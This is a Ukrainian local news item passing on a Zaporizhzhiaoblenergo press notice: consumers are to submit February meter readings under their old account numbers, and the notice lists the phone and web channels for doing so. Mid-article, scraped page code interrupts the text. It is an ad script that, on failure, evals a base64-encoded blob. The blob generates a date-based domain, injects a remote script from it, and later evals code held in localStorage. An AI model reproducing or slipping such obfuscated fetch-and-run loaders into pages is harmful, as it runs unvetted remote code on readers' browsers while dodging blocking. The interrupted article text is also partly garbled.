Споживачі передають покази лічильників не за тими номерами.
Про це повідомляє прес-служба ПАТ «Запоріжжяобленерго», передає «Акцент».
Як засвідчив перший день прийому показів, після того, як Постачальник Універсальної послуги здійснив заміну номерів особових рахунків, чимало споживачів електроенергії намагаються передати покази саме за «новими» номерами.
«Але, оскільки, ПАТ «Запоріжжяобленерго» НЕ ЗМІНЮВАЛО НОМЕРИ ОСОБОВИХ РАХУНКІВ, що використовуються для прийому показів електролічильників, покази, передані за «новими» номерами, програмний комплекс не реєструє – адже у базі нашої компанії таких особових рахунків фізично немає» — пояснює прес-служба. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Тож зверніть увагу: покази лічильників треба передавати за старими номерами особових рахунків. «Нові» номери, що запровадив Постачальник Універсальної послуги, необхідні у взаємовідносинах із ним – у тому числі для оплати за спожиту електроенергію.
Якщо ви вже встигли передати покази за «новим» номером рахунку, будь ласка, передайте їх ще раз – але за «старим» номером, що зареєстрований у ПАТ «Запоріжжяобленерго».
Нагадуємо: покази електролічильників за лютий необхідно передати до 03 березня включно у будь-який з наведених нижче спосіб: (adsbygoogle = window.adsbygoogle || []).push({});
телефоном, за допомогою голосового меню самообслуговування; (061) 228-51-09;+38 (098) 168-01-01;+38 (050) 119-91-69;+38 (093) 170-23-35;через сайт ПАТ «Запоріжжяобленерго» за посиланням; через кол-центр ПАТ «Запоріжжяобленерго» за телефоном 0-800-304-502. Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/spozhivachi-nepravilno-peredali-pokazi-lichilnikiv-zvernennya-zaporizhzhyaoblenergo/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook